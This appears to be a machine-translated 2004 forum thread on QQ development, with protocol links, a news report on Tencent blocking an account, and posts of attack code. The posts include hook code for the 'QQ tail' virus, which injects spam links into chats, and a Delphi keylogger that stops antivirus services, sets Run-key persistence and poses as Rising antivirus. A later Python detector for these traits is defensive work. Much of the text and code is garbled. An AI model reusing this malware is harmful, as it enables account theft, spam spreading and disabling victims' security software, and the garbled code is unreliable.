QQ development information

xiaoxiao2021-03-06  111

Here is some QQ protocol documentation organized by ISQ:

http://lumaqq.linuxsir.org/doc/protocol Document From ISQ.rar

Www.realoa.net Delphi program, passive code, online debugging

Www.anyq.net C program, active code

Lumaqq

http://lumaqq.linuxsir.org/main/

Welcome to the LumaQQ collected sticky links:

lumaqq.linuxsir.org: http://www.linuxsir.org/bbs/showthr...threadid=108131

LumaQQ Patch 2: http://www.linuxsir.org/bbs/showthr...threadid=110288

LumaQQ release FreeBSD decompression package, concrete installation method reference online document: http://www.linuxsir.org/bbs/showthr..threadid=111247

lumaqq 0.1 beta1 patch 1: http://www.linuxsir.org/bbs/showthr..threadID=107085

There is a new QQ software out!! http://www.linuxsir.org/bbs/showthr...threadid=106715

Complete compilation method from GTK 2.4.0 to GIMP2 to OpenQ3: http://www.linuxsir.org/bbs/showthr..threadID=105467

luma heroes Note: Lumaqq cannot receive Gaim 0.64 information: http://www.linuxsir.org/bbs/showthr...threadID=111823

Eclipsem9 released, it seems that the LUMAQQ input method is still: http://www.linuxsir.org/bbs/showthr...threadid=111159

OpenQ

http://openq.linuxsir.org/cgi-bin/wiki/moin.cgi/

OpenQ collected sticky links:

OpenQ group website: http://openq.linuxSir.org

openq 0.3 public test: http://www.linuxsir.org/bbs/showthr..threadid=104399

Release OpenQ 0.3.0-P2: http://www.linuxSir.org/bbs/showthr...threadid=104881

I made an OpenQ's BSD version of the patch: http://www.linuxsir.org/bbs/showthr..threadidiD=107516

Gaim-qq2.71p1 installation method, solve MSN lacks SSL support and the case where the QQ plugin is not found: http://www.linuxsir.org/bbs/showthr...;threadid=99976

Gaim QQ 0.2.7 released: http://www.linuxsir.org/bbs/Showthr...;threadid=95807

Invitation for more people to join the OpenQ initiative: http://www.linuxsir.org/bbs/showthr..threadid=103581

__________________

#

Reply: QQ information

2004-10-20 9:35 AM

Bing314

Valong / article

Miss Xu of Hangzhou is a long-time user of Tencent QQ, but her QQ number was recently blocked. Miss Xu pursued the matter vigorously, and her reaction went from fright to anger.

(1) Event - QQ number is seized

One day in June, Miss Xu turned on her computer as usual, and a window suddenly popped up with the prompt "Forbidden use". Miss Xu tried several times, with the same result. Miss Xu later recalled: "I first inquired by email, and nobody responded. After a week I finally could not help making a long-distance call to Shenzhen to ask Tencent's customer service to give me a reason. The customer service found it in a few minutes, saying that I had downloaded a politically sensitive document, that there was a record, and so the number was seized." With Miss Xu's consent, the reporter called Tencent in Shenzhen in the user's name to find out why the number had been seized. After the reporter gave the QQ number and password, the customer service staff asked the reporter to wait a little. A few minutes later, the staff told the reporter that this QQ number had downloaded sensitive information on May 30th, so it was seized, and "it is impossible to get it back"!

As Miss Xu recalls, she did download a document. "If it were not for Tencent's record, I would not have remembered it. But I did not read all of it, and I did not spread it. Is that also grounds for blocking a number?" The strange thing is that Miss Xu did not download the document using Tencent's TE browser.

Miss Xu wonders: once QQ is installed, can it monitor the user's computer usage and send information from the user's computer back to Tencent's server? If so, what personal privacy is left? Moreover, as a QQ member, Miss Xu had registered her ID number and mobile phone number at Tencent's request.

In fact, this is not just a simple privacy problem. If a government department or a business has QQ installed on its computers, it could create a serious risk of information leakage. The TE browser bundled with QQ provides a "who is with me" function that can track which sites QQ users visit.

(2) Survey - user information is recorded

An industry insider who has studied software security issues confirmed that, using the IRIS packet-capture software, QQ can be seen passing unknown data to the server, and that this data is encrypted.

An article published by the Scientific Times also shows that Tencent bundles a browser program with the QQ program, and that its "who is with me" function allows any user to find out which other Tencent QQ users are currently browsing the same page. Which pages users are viewing can thus also be monitored, and the collected browsing records can be put to commercial use.

Just as the reporter began to investigate and asked Tencent for an interview, Miss Xu's QQ number was unexpectedly unblocked and could be used again.

The reporter called Tencent's Marketing Department and sent an interview outline by email. The reporter's main questions were:

1. Does QQ monitor each user's usage, including which websites are visited and which documents are downloaded?

2. How does QQ monitor this information?

3. As a private business, will users' personal information and usage habits not be put to other uses?

4. If QQ's monitoring function is used by hackers or other intelligence agencies, should Tencent be held responsible?

5. Can Tencent learn the secrets of government departments or commercial companies?

(3) Reasons - Enterprises political color

After the reporter's interview request, Tencent gave no written reply and made no formal interview arrangement, but communicated with the reporter through a public relations company in Beijing.

The public relations company called the reporter at the number the reporter had left and tried to persuade the reporter not to investigate or report on the matter. She told the reporter that Tencent is currently on a strong upward trend, that communication software of every kind keeps appearing on the market, that the competition is very intense, and that such a report would not be good for Tencent QQ. Regarding Miss Xu's QQ number, the public relations company disclosed that Tencent had received an instruction from a relevant higher-level department to monitor the user's usage and block her number. She refused to reveal which department it was, and only warned the reporter that, if the matter were reported, there might be a "sacrifice". This was obviously an attempt to put a layer of political color on a business problem. After hearing this news, Miss Xu was shocked and angry: "Why does this feel so sinister? Am I being treated as an enemy of the state?" Miss Xu also vowed to the reporter that she had not released any bad information through QQ: "If there is any, let them produce the evidence. Who was it sent to?"

According to the reporter's investigation, the competent authorities have indeed required network companies and communication software companies to technically filter and block bad information on the network so that it does not spread, but no company has received an instruction requiring it to monitor users' usage. "If someone really wanted to monitor a person, they would have no need to use them," a friend who has worked in intelligence told the reporter.

(4) Be wary - communication software security has hidden dangers

A communications software company's technicians told reporters that in instant messaging software, the monitoring program is added, and it is difficult to implement, as long as several keyword retrieval and filtering on the user, you can return the critical information back to the server. Not to monitor all chat records.

Some people say that instant messaging software has security risks. Consumers are entitled to know this, but a commercial company has no right to monitor users' operation records; respecting and protecting users' privacy and security is an internationally accepted business principle.

According to CCID, on June 14 the Office of the Chief Prosecutor in New York, USA, said that Netscape, part of AOL Time Warner, will pay $100,000 in a settlement of complaints that its software was used to track user downloads.

On the other hand, because of security defects in QQ itself, hacking software targeting QQ keeps growing. In the history of Chinese software, QQ is probably the most attacked online instant messaging software. Many commercial companies have recognized QQ's security issues, and some organizations and commercial companies in Beijing strictly forbid the use of QQ software.

Before the reporter published, Tencent passed an email, and sent a written reply to the editor, and Miss Xu, Hangzhou said that she would not be good, she wants to "call". " But in any case, Tencent records the user's usage information, which cannot cause more users to pay attention to the security issues of network communication software.

Appendix: Tencent's written reply comments

Hello, I am:

Regarding the outline of the Hangzhou user number, Tencent's formal reply is as follows, I hope you will report with an objective justice attitude.

First of all, it is necessary to strictly declare that under the information of massive information, Tencent adopts a point-to-peer message transceiver, determines Tencent to monitor the operation of the user on the computer. Any unit or individual who is not real-in-case is required to be responsible. As for the detection of your email, in the case of operator background, network environment, use software, operation steps are unclear, we can't judge the authenticity of this detection, and cannot respond.

As an instant communication software, Tencent QQ is technically used by the principle of a point. That is, in most cases, the communication between the user is from one user to another, and does not need to be transferred through the Tencent server. The Tencent server will only help users save and transfer messages in special cases of network instability, network condition complex or user offline. According to the provisions of the higher network security information processing, through the message transferred by the server, the message issued by Tencent will pass the information security filtering mechanism, which is because the user has transferred the message content containing sensitive vocabulary through the Tencent server. Therefore, Tencent made a title. As for later unscence, it is because the user's message contains sensitive content, but it is not intended to spread illegal content. In order to protect user rights, we understand this number to the process. Tencent has always paid attention to and protects user privacy. Regarding the message content of the user, the transmission time and the other party number, Tencent cannot be available.

Tencent will be available in the absence of a legal procedure if necessary.

Tencent QQ provides a service for massive users, with more than 20 million users to communicate, chat. The amount of sending messages is from 1 billion, and Tencent is not necessary to save each user's message record, and more do not talk about the computer usage behavior of monitoring 10 million users.

Under the requirements of the competent department, Tencent will cooperate with the competent department to assist network security work and do some processing according to the competent authorities. All behaviors are in line with relevant regulations and requirements.

Tencent

June 23, 2003


#

Reply: QQ information

2004-10-20 9:59 AM

Bing314

Author CNSS 2004-8-18

All rights reserved, please indicate the source

http://blog.9cbs.net/cnss

I recently wrote a better format than QQWRY, click here.

I saw a blog on QQWRY format just passed by RSS: http://blog.9cbs.net/taft/archive/2004/08/18/77559.aspx

I can't think of qqwry, this is designed two years ago, this format should be eliminated. Why do you say that it is index binary look to reduce memory occupancy and improve the lookup speed.


#

Reply: QQ information

2004-10-20 2:20 pm

Bing314

QQ2004's RICH handle lookup method and the implementation of the tail virus

SteveCrisewu's column

Http://blog.9cbs.net/stevecrisewu/archive/2004/09/16/106984.aspx

I have seen many people asking about QQ, mainly about studying the QQ tail. There are many examples on the Internet, but when the code provided by the author is used, the RichEdit control cannot be found correctly, so the hooks cannot be installed. The code below should work; the source code of QQHOOK is attached.

In fact, the key is that the 2004 version of QQ changed things: it adds a form on top of the original form, so the original author's code cannot find the handle of the Rich window.

Test CPP

#include

// # include

#include "qqhook.h"

#pragma comment (Lib, "QQHOK.LIB")

#include "resource.h"

#define id_mytimer 419 // 1/4æê ± ÷ id

BOOL G_BSTART;

HWND G_HQQ;

Lresult Callback Procmain (HWND HDLG, UINT MSG, WPARAM WPARAM, LPARAM LPARAM)

{

? Switch (MSG)

? {

? Case WM_Close:

? // ?? AnimateWindow (HDLG, 800, aw_hide | aw_slide | aw_ver_positive); ??? Enddialog (HDLG, 0);

??? Break;

? Case WM_Command:

??? {

????? f (loword (wparam) == IDC_BTN_CONTROL)

????? {

??????? g_bstart =! g_bstart;

??????? setdlgitemtext (HDLG, IDC_BTN_CONTROL, G_BSTART? "£ £ ¹¹": "¿ªªª1/4");

??????? ing (g_bstart)

????????? setTimer (HDLG, ID_MYTIMER, 1000, NULL);

??????? ELSE

??????? {

????????? KillTimer (HDLG, ID_MYTIMER);

????????? seton (null);

???????}

?????}

????? f (loword (wparam) == IDC_BTN_EXIT)

??????? SendMessage (HDLG, WM_CLOSE, 0, 0);

???}

??? Break;

? Case WM_DESTROY:

??? postquitmessage (0);

??? Break;

? Case WM_INITDIALOG:

??? {

????? int x, y;

????? RECT RECT;

????? g_bstart = false;

????? getWindowRect (HDLG, & Re);

????? x = getSystemMetrics - Rect.right Rect.Lester;

????? y = getSystemMetrics - Rect.bottom Rect.top - 10;

????? setwindowpos (HDLG, HWND_TOPMOST, X, Y, 0, 0, SWP_NOSIZE | SWP_NOZORDER);

?? // ?? ANIMATEWINDOW (HDLG, 800, aw_slide | aw_ver_negative);

???}

??? Break;

? Case WM_Timer:

??? {

????? if (! iswindow (g_hqq))

????? {???????

??????? hwnd hwnd;

?? hwnd hsend;

?? //? Cwnd * mywnd;

?? int Nidfirst;

?? int flag;

?? char lpbuf [256];

?? // ?? DWORD A;

??????? g_hqq = NULL;

?? hwnd = null;

?? hsend = null;

??????? seton (null);

?? //? do

?? //? {

?? // ??? g_hqq = findwindowex (null, g_hqq, "# 32770", null);???

??

?? // ?? getWindowText (g_hqq, lpbuf, 255);?

??

?? //? IF (strcmp (lpbuf, "óë áäìö ð") == 0) Break;

?? // ?? hsend = findwindowex (g_hqq, null, "button", "¢ ëí (& s)");??

??

?? //?} While (! (g_hqq! = null && hsend! = null); nidfirst = 0;

?? Flag = 0;

?? While (1)

?? {

??? g_hqq = findwindowex (null, g_hqq, "# 32770", null);

??? IF (g_hqq == null) Break;

??? getWindowText (g_hqq, lpbuf, 256);???

??? hWnd = getWindow (g_hqq, gw_child);

??? i (hwnd || :: iswindow (hwnd))

??? {

???? Nidfirst = getdlgctrlid (hwnd);

???? do

???? {

????? getclassname (hwnd, lpbuf, 256);???

????? ing (strcmp (lpbuf, "# 32770") == 0)

????? {

?????? hsend = findwindowex (hwnd, hsend, "button", "¢ ëí (& s)");

?????? ing (hsend)

?????? {

??????? flag = 1;

??????? g_hqq = hwnd;

??????? breaf;

??????}

?????}

????? getWindowText (hwnd, lpbuf, 256);???

????? hwnd = :: getwindow (hwnd, gw_hwndnext);??

????? if (! :: iswindow (hwnd) || hWnd == null) ?? Break;

????} while (nidfirst! = getdlgctrlid (hwnd));?

???}?

??? IF (flag) Break;

??}

??????? IF (g_hqq! = null)

????????? STHOOK (G_HQQ);

?????}

???}

??? Break;

?

? Return 0;

}

Int WinApi WinMain (Hinstance Hinstance, Hinstance Hprevinstance, LPSTR LPCMDLINE, INT NSHOWCMD)

{

DialogBoxParam (Hinstance, MakeintResource (IDD_DIALOG), NULL, (DLGPROC) procmain, 0);

DWORD A = getLastError ();

? Return 0;

}

?

QQ hook source code

CPP file

#include

#define qqtailapi __declspec (dllexport)

#include "qqhook.h"

// ¶ ò¹¹2ïíêý4¾¶¶îîîî

#pragma data_seg ("Shared")

HHOOK G_HPROC = NULL; // '° ¹¹¹3¹¹3 × ó/4Ä ± ±

HHOOK G_HKEY = null; // 1/4üå¹¹3 × 子4Ä ± ú

HWND g_hrich = null; // îä ± 3/4¿ ò/4Ä ± ú

#pragma data_seg ()

#pragma Comment (Linker, "/ Section: Shared, RWS")

// dll/4Ä ± ú

Hinstance g_hinstdll = null;

// îòμÄ¡ ° 2 ° í. ±

TCHAR G_STR [] = "/ N¶ô2» æð £ ¬äúòñ¾¾¾ »1/2 û¹¹áäìì £";

// oê¹¹|Äü £ oïòîîä ± 3/4¿ òõõ3ìùî2 ° ívoid Pastetext (HWND HRICH)

{

Hglobal HMEM;

? Lptstr pstr;

? // öåÄÄú'æ¿¿¿ Õõä

? // sendMessage (HRICH, WM_SETTEXT, 0, LPARAM (""));

HMEM = GLOBALLOC (GHND | GMEM_SHARE, SIZEOF (g_str));

PSTR = (LPTSTR) Globalock (HMEM);

? lstrcpy (pstr, g_str);?

? GlobalUnlock (HMEM);

OpenClipboard (NULL);

? Emptyclipboard ();

? // éèö1/11ìù ° åîä ± 3/4

• setClipboardData (CF_Text, HMEM);

CLOSECLIPBOARD ();

? // êí · åäú'æ¿ Õõä

? GlobalFree (HMEM);

? // õ 3ìõùùîä ± 3/4

? SendMessage (HRICH, WM_PASTE, 0, 0);

}

// ¹3 × ¹¹¹3ì £ ¬¬ààêó¡¡ ° · ¢ ëí¡¡ ± μäãüîûûûû ¢

LResult Callback CallWndProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM)

{

CWPSTRUCT * P = (cwpstruct *) lparam;

? // 2¶ »ñ¡ ° · ¢ ëí¡¡ ± ° å ¥

? IF (p-> message == wm_command && loword (p-> wparam) == 1)

??? Pastetext (g_hrich);

Return CallNexthookex (g_hproc, ncode, wparam, lparam);

}

// 1/4üå¹¹3 × ¹¹¹3ì £ ¬¬àààêó¡ ° · ¢ ëí¡¡ ± μäèè1/4üûûûû ¢

Lresult Callback KeyboardProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM)

{

? // 2¶ »ñèè1/4üûûû ¢

? IF (wparam == vk_return && getasynckeystate (vk_control) <0 && lparam> = 0)

??? Pastetext (g_hrich);

Return CallNexthookex (G_hKey, Ncode, WPARAM, LPARAM);

}

// ¹¹1/2 ¹¹3 × ó

Bool WinAPI STHOK (HWND HQQ)

{

? BOOL BRET = FALSE;

? IF (hqq! = null)

? {

??? DWORD DWTHREADID = GetWindowThreadProcessId (HQQ, NULL);

??? // ¸ðð »oãóhotteyμä²õõ''âë ¬¬¡¡¡¡ È áëîò¹¹óãspy μÄâé 3

??? g_hrich = getWindow (getdlgitem (hqq, 0), gw_child);

??? i (g_hrich == null)

????? Return False;

??? // ¹¹1/2 ¹¹3 × ó

??? g_hproc = setWindowshookex (Wh_CallWndProc, CallWndProc, g_hinstdll, dwthreadid);

??? g_hkey = setWindowshookex (wh_keyboard, keyboardproc, g_hinstdll, dwthreadid); ??? Bret = (g_hproc! = null) && (g_hkey! = null);

?

? Else

? {

??? // ¶ôô¹3 × ó

??? Bret = UnHookWindowsHookex (g_hproc) && unhookwindowshookex (g_hkey);

??? g_hproc = null;

??? g_hKey = null;

??? g_hrich = null;

?

RETURN BRET;

}

// DLLö ÷ o ¯êý

Bool WinApi Dllmain (Hinstance Hinstdll, DWord FDWREASON, LPVOID LPVRESERVED)

{

? IF (fdwreason == dll_process_attach)

??? g_hinstdll = hinstdll;

Return True;

}

?

head File

#ifndef qqtailapi

#define qqtailapi __declspec (dllimport)

#ENDIF

QQTAILAPI BOOL WINAPI STHOK (HWND HQQ);

?


#

Reply: QQ information

2004-10-20 2:33 PM

Bing314

Title QQ2004hack Select Blog from MSFM

Keyword QQ2004HACK

Somewhere

Thank SforveVer to help

HookKey: string;

HHOOK: Integer;

Creeper, Creeper1: TextFile;

AhWnd, ComboBoXH: Thandle; // Handle

QqformID: hwnd;

User: array [0..254] of char;

Sendbody: String;

PSMTP, Puser, PPass, Pgetmail, Ptomail, Subject, MailText: String

IMPLEMentation

// Looking for QQ chat window

Function fpopoid (ahwnd: hwnd; w: integer): boolean; stdcall;

Var Wintext: pchar;

Begin

RESULT: = TRUE;

GetMem (Wintext, 100);

GetWindowText (Ahwnd, Wintext, 100);

IF POS ('and', Wintext)> 0 THEN

Begin

Trysendmail;

Sleep (100);

UnHookWindowsHookex (HHOOK);

HHOOK: = 0;

Application.Terminate;

END;

END;

Function FMSGidIdit (ahwnd: hwnd; w: integer): boolean; stdcall;

VAR

f: TextFile;

Begin

RESULT: = TRUE;

ComboBOBOXH: = FindWindowEx (QQFormid, 0, 'ComboBox', NIL);

SendMessage (ComboBOBOXH, WM_GETTEXT, 254, Integer (@USER));

IF TRIM (user) <> '' THEN

Begin

AssignFile (f, getwindir 'name.txt'); REWRITE (F);

Write (f, 'QQ User Name:' User);

Closefile (f);

EXIT;

END;

END;

Function FQQID (AhWnd: hwnd; w: integer): boolean; stdcall;

Var Wintext: pchar;

Begin

GetMem (Wintext, 100);

GetClassName (AhWnd, Wintext, 100);

IF Wintext = '# 32770' THEN

Begin

QqformID: = ahwnd; // Get QQ window handle

IF QqformID <> 0 THEN

Begin

RESULT: = TRUE;

EnumchildWindows (QQFormID, @ fmsgidited, 0); // Temporary

END;

END;

END;

Function KeyhookResult (lp: integer; wp: integer): PCHAR;

Begin

Result: = '[Print Screen]';

Case LP of

10688: Result: = '`';

561: Result: = '1';

818: Result: = '2';

1075: Result: = '3';

1332: Result: = '4';

1589: RESULT: = '5';

1846: Result: = '6';

2103: Result: = '7';

2360: Result: = '8';

2617: Result: = '9';

2864: RESULT: = '0';

3261: Result: = '-';

3515: Result: = '=';

4177: Result: = 'q';

4439: Result: = 'W';

4677: Result: = 'e';

4946: Result: = 'r';

5204: Result: = 't';

5465: Result: = 'y';

5717: Result: = 'u';

5961: Result: = 'i';

6223: Result: = 'o';

6480: Result: = 'p';

6875: Result: = '[';

7133: Result: = ']';

11228: RESULT: = '/';

7745: Result: = 'a';

8019: Result: = 's';

8260: Result: = 'd';

8518: Result: = 'f';

8775: Result: = 'g';

9032: Result: = 'h';

9290: Result: = 'J';

9547: Result: = 'k'; 9804: Result: = 'L';

10170: Result: = ';';

10462: Result: = '' '';

11354: Result: = 'Z';

11608: Result: = 'x';

11843: RESULT: = 'c';

12118: Result: = 'V';

12354: RESULT: = 'b';

12622: Result: = 'n';

12877: RESULT: = 'm';

13244: Result: = ',';

13502: Result: = '.';

13759: Result: = '/';

13840: Result: = '[right-shift]';

14624: Result: = '[Space]';

283: Result: = '[ESC]';

15216: Result: = '[f1]';

15473: Result: = '[f2]';

15730: Result: = '[f3]';

15987: Result: = '[f4]';

16244: Result: = '[f5]';

16501: Result: = '[f6]';

16758: Result: = '[f7]';

17015: Result: = '[f8]';

17272: Result: = '[f9]';

17529: Result: = '[f10]';

22394: Result: = '[f11]';

22651: Result: = '[f12]';

10768: Result: = '[left-shift]';

14868: Result: = '[Capslock]';

3592: RESULT: = '[backss]';

3849: Result: = '[Tab]';

7441:

IF WP> 30000 THEN

Result: = '[right-ctrl]'

Else

Result: = '[left-ctrl]';

13679: Result: = '[Num /]';

17808: Result: = '[Numlock]';

300: Result: = '[Print Screen]';

18065: Result: = '[scroll lock]';

17683: Result: = '[pause]';

21088: Result: = '[Num0]';

21358: Result: = '[Num.]';

20321: Result: = '[Num1]';

20578: Result: = '[Num2]'

20835: Result: = '[Num3]'; 19300: Result: = '[Num4]'

19557: Result: = '[Num5]';

19814: Result: = '[Num6]';

18279: Result: = '[NUM7]'

18536: Result: = '[Num8]';

18793: Result: = '[NUM9]'

19468: Result: = '[* 5 *]';

14186: Result: = '[Num *]';

19053: Result: = '[Num -]';

20075: Result: = '[NUM ]';

21037: Result: = '[insert]';

21294: Result: = '[delete]';

18212: Result: = '[Home]';

20259: Result: = '[end]';

18721: Result: = '[PageUp]';

20770: Result: = '[pagedown]';

18470: Result: = '[UP]';

20520: Result: = '[Down]';

19237: Result: = '[left]';

19751: Result: = '[Right]';

7181: Result: = '[enter]';

END;

END;

Function hookproc (icode: integer; wparam: wparam; lparam: lparam): LRESULT; stdcall;

VAR

Creeper: TextFile;

Begin

IF (PEVENTMSG (LPARAM) ^. Message = WM_Keydown) THEN

HookKey: = HookKey KeyHOKRESULT (peventmsg (lparam) ^. paraml, peventmsg (lparam) ^. paramh;

IF Length> 0 THEN

Begin

IF EnumWindows (@ fqqid, 0) THEN

Begin

AssignFile (Creeper, getWindir 'key.txt');

If FileExists (getWindir 'key.txt') THEN

Begin

Rewrite (Creeper);

Writeln (Creeper, HookKey);

Closefile (Creeper);

END;

END;

END;

END;

Procedure TFORM1.FormCreate (Sender: TOBJECT);

VAR

Myname: String;

Batchfilename: String;

BFILE: TEXTFILE;

Sysdir: string;

NOTII: PNOTIFYICONDATA;

Begin

Application.showmainform: = false;

Sysdir: = getwindir;

BatchFileName: = sysdir 'killrav.bat';

AssignFile (Bfile, BatchFileName); Rewrite (BFILE);

Writeln (bfile, '@net stop xicCenter');

Writeln (bfile, '@net stop rsravmon ");

Writeln (bfile, '@close');

Closefile (bfile);

MyName: = extractFileName (Application.exename); // Get file name

IF Application.exename <> sysdir myname dam //

Begin

Copyfile (Pchar (Application.exename), Pchar (Sysdir MyName), False;

END;

With tregistry.create do

Begin

RootKey: = HKEY_LOCAL_MACHINE

OpenKey ('/ Software / Microsoft / Windows / CurrentVersion / Run', TRUE);

WriteString ('System, Rundll', sysdir 'ravMom.exe');

FREE;

END;

AssignFile (Creeper, sysdir 'key.txt');

IF not fileexists (sysdir 'key.txt') THEN

Begin

Rewrite (Creeper);

Closefile (Creeper);

END;

Assignfile (Creeper1, Sysdir 'Name.txt');

IF not fileexists (sysdir 'name.txt') THEN

Begin

Rewrite (Creeper1);

Closefile (Creeper1);

END;

Winexec (Pchar (Sysdir 'Killrav.bat'), SW_HIDE);

HHOOK: = 0;

HHOOK: = SETWINDOWSHOKEX (WH_Journal, Hinstance, 0);

NOTII: = New (PNOTICONDATA);

Noti.cbsize: = 80;

Noti.wnd: = form1.handle;

NOTI.UID: = 0;

NOTI.sztip: = 'Rising Computer Monitor';

NOTI.HICON: = form1.icon.handle; // Rising icon

Noti.uflags: = nif_message or nif_icon or nif_tip;

Shell_notifyicon (NIM_ADD, NOTII);

END;

Procedure TFORM1.TIMER1TIMER (Sender: TOBJECT);

Begin

Enumwindows (@ fpopoid, 0);

END;

Procedure TFORM1.FORMDESTROY (Sender: TOBJECT);

Begin

Deletefile (getWindir 'key.txt');

Deletefile (getWindir 'name.txt');

Deletefile (getwindir 'killrav.bat');

END;

End.

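A defender's view of the program posted above, as an added example that is not part of the original post: it checks autorun records, a batch script and a file listing for the three behaviours visible in that code (a Run-key value whose name and target imitate system or antivirus components, a script that stops security services with net stop, and the key.txt / name.txt / killrav.bat files in the Windows directory). The record layout, the function names, the "ravmon.exe" reference name and all sample data are assumptions constructed for the illustration.

```python
import ntpath
import re

# Names worth protecting from imitation. "ravmon.exe" is an assumption about what the
# posted program's "ravMom.exe" is meant to resemble; extend the set for your estate.
PROTECTED_NAMES = {"ravmon.exe", "rundll32.exe", "svchost.exe"}
# Service names exactly as they appear in the posted killrav.bat lines.
SECURITY_SERVICES = {"xiccenter", "rsravmon"}
# File names the posted program creates in the Windows directory.
DROP_FILES = {"key.txt", "name.txt", "killrav.bat"}
RUN_KEY = r"software\microsoft\windows\currentversion\run"
NET_STOP = re.compile(r'^\s*@?\s*net(?:\.exe)?\s+stop\s+"?([^"\s]+)', re.I)
EXE_PATH = re.compile(r"(.+?\.(?:exe|bat|cmd|com|scr))(?:\s|$)", re.I)


def edit_distance(a, b):
    """Plain Levenshtein distance, used to spot one-letter lookalike names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def exe_name(command):
    """Lower-cased file name of the program an autorun command line starts."""
    command = command.strip()
    if command.startswith('"'):
        path = command[1:].split('"', 1)[0]
    else:
        m = EXE_PATH.match(command)
        path = m.group(1) if m else command.split(" ", 1)[0]
    return ntpath.basename(path).lower()


def check_run_entry(key, value_name, command):
    """Findings for one autorun record: lookalike target or misleading value name."""
    if RUN_KEY not in key.lower():
        return []
    exe, findings = exe_name(command), []
    for real in sorted(PROTECTED_NAMES):
        stem = real[:-4].rstrip("0123456789")      # "rundll32.exe" -> "rundll"
        if exe != real and edit_distance(exe, real) == 1:
            findings.append(f"target {exe} is one edit away from {real}")
        if stem in value_name.lower() and not exe.startswith(stem):
            findings.append(f"value name mentions {stem} but starts {exe}")
    return findings


def check_script(text):
    """Security services that a batch script tries to stop with 'net stop'."""
    hits = []
    for line in text.splitlines():
        m = NET_STOP.match(line)
        if m and m.group(1).lower() in SECURITY_SERVICES:
            hits.append(m.group(1).lower())
    return hits


def check_files(paths):
    """Paths whose name is a known drop file and whose folder is the Windows directory."""
    hits = []
    for p in paths:
        folder, name = ntpath.split(p)
        if name.lower() in DROP_FILES and folder.lower().endswith(("\\windows", "\\winnt")):
            hits.append(p)
    return hits


def triage(run_entries, script, files):
    """Combine the three checks into (category, subject, detail) rows."""
    report = []
    for entry in run_entries:
        report += [("autorun", entry[1], f) for f in check_run_entry(*entry)]
    report += [("script", "net stop", s) for s in check_script(script)]
    report += [("file", "drop", p) for p in check_files(files)]
    return report


# Constructed sample data (not taken from a real host).
RUN_ENTRIES = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "System, Rundll",
     r"C:\WINDOWS\ravMom.exe"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "RavMon",
     r'"C:\Program Files\Rising\Rav\RavMon.exe" -system'),
]
SCRIPT = "@net stop xicCenter\n@net stop rsravmon\n@close\n"
FILES = [r"C:\WINDOWS\key.txt", r"C:\WINDOWS\name.txt", r"C:\WINDOWS\killrav.bat",
         r"C:\Users\a\Documents\key.txt"]

if __name__ == "__main__":
    for row in triage(RUN_ENTRIES, SCRIPT, FILES):
        print(row)
```

The second autorun record and the key.txt under Documents are included to show what the checks leave alone.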

#

Reply: QQ information

2004-10-20 2:35 PM

Bing314

Title Getting the handle of a process such as QQ.EXE Select Blog from CSO

Keyword getting the handle of a process such as QQ.exe

Somewhere

The function is defined, I didn't add it, I found it!

Dim uSnapshot As Long           ' system snapshot return value
Dim uResult As Long             ' process traversal return value
Dim uProcess As PROCESSENTRY32  ' process structure variable
Dim meHandle As Long            ' process handle

uSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)  ' take a system snapshot
uProcess.dwSize = Len(uProcess)  ' initialize the length of the process structure
If uSnapshot Then
    uResult = Process32First(uSnapshot, uProcess)  ' get the first process
    Do While uResult
        ' szExeFile is NUL-terminated: compare only the part before the first Chr(0)
        If InStr(Left(uProcess.szExeFile, InStr(uProcess.szExeFile, Chr(0)) - 1), "QQ.exe") > 0 Then
            meHandle = OpenProcess(PROCESS_ALL_ACCESS, True, uProcess.th32ProcessID)
            ' meHandle is the handle of QQ you want
        End If
        uResult = Process32Next(uSnapshot, uProcess)  ' get the next process in the snapshot
    Loop
End If


#

Reply: QQ information

2004-10-20 2:44 PM

Bing314

The title uses SDK to develop "stealing QQ login password" program to select Blog of 3661512

Keyword SDK QQ password

http://dev.9cbs.net/develop/Article/26/26112.shtm


#

Reply: QQ information

2004-10-20 2:45 PM

Bing314

http://dev.9cbs.net/develop/Article/24/24144.shtm

Title "QQ Tail Virus" core technology to achieve BLOG from Titilima

Keyword QQ tail virus

Somewhere

Disclaimer: This article is intended to explore technology; please do not use the techniques in the article for any destructive purpose.

In 2003, the QQ tail virus made quite a show. It used IE's email header vulnerability to spread wildly on QQ. When an infected user sends a message to someone else, the virus automatically appends a sentence after the message text. The wording varies, but in short it hopes that the recipient will click the URL in that sentence. The picture below shows a message sent from an infected QQ: the infected user typed only the word "hello", and the rest is the work of the virus.

What I discuss below is the technology used by the QQ tail virus. Since the virus's source code cannot be obtained, the following code is entirely my own conjecture; fortunately, its effect is basically consistent with the virus itself.

Paste tail

The first and simplest problem is how to add the text. There is no secret to this technique: the text is pasted into the RichEdit control of the QQ message window through the clipboard. The code is as follows:

Tchar g_str [] = "Welcome to my small station to sit: http://titilima.nese.net";

// Function: Paste the tail in the text box

Void Pastetext (HWND HRICH)

{

Hglobal HMEM;

LPTSTR PSTR;

// Allocate memory space

HMEM = GLOBALLOC (GHND | GMEM_SHARE, SIZEOF (g_str)); PSTR = GlobalLock (HMEM);

LSTRCPY (PSTR, G_STR);

GlobalUnlock (HMEM);

OpenClipboard (null);

EMPTYCLIPBOARD ();

// Set the clipboard text

SetClipBoardData (CF_Text, HMEM);

CloseClipboard ();

/ / Release memory space

GlobalFree (HMEM);

// Paste text

SendMessage (hrich, wm_paste, 0, 0);

}

hook

OK, the next question is: when should this text be pasted? Some articles on the Internet that study the QQ tail implementation use a timer to control the paste time, something like this:

Void CQQTaildlg :: Ontimer (uint nidevent)

{

Pastetext (HRICH);

}

This is indeed a solution, but it has a big limitation: how should the timer interval be set? Perhaps the infected user is still typing when, whoosh, the tail text appears ...

However, the virus itself does not work like this; it pastes the text precisely when you click "Send" or press Ctrl+Enter. In January 2003 a P2 machine was infected, and because the system was slow, the timing of the text paste could be clearly seen.

At this point, the facts I have described will surely make you say: hook! Yes, it is a hook. What follows uses hooks to faithfully reproduce the technique of the "QQ tail virus".

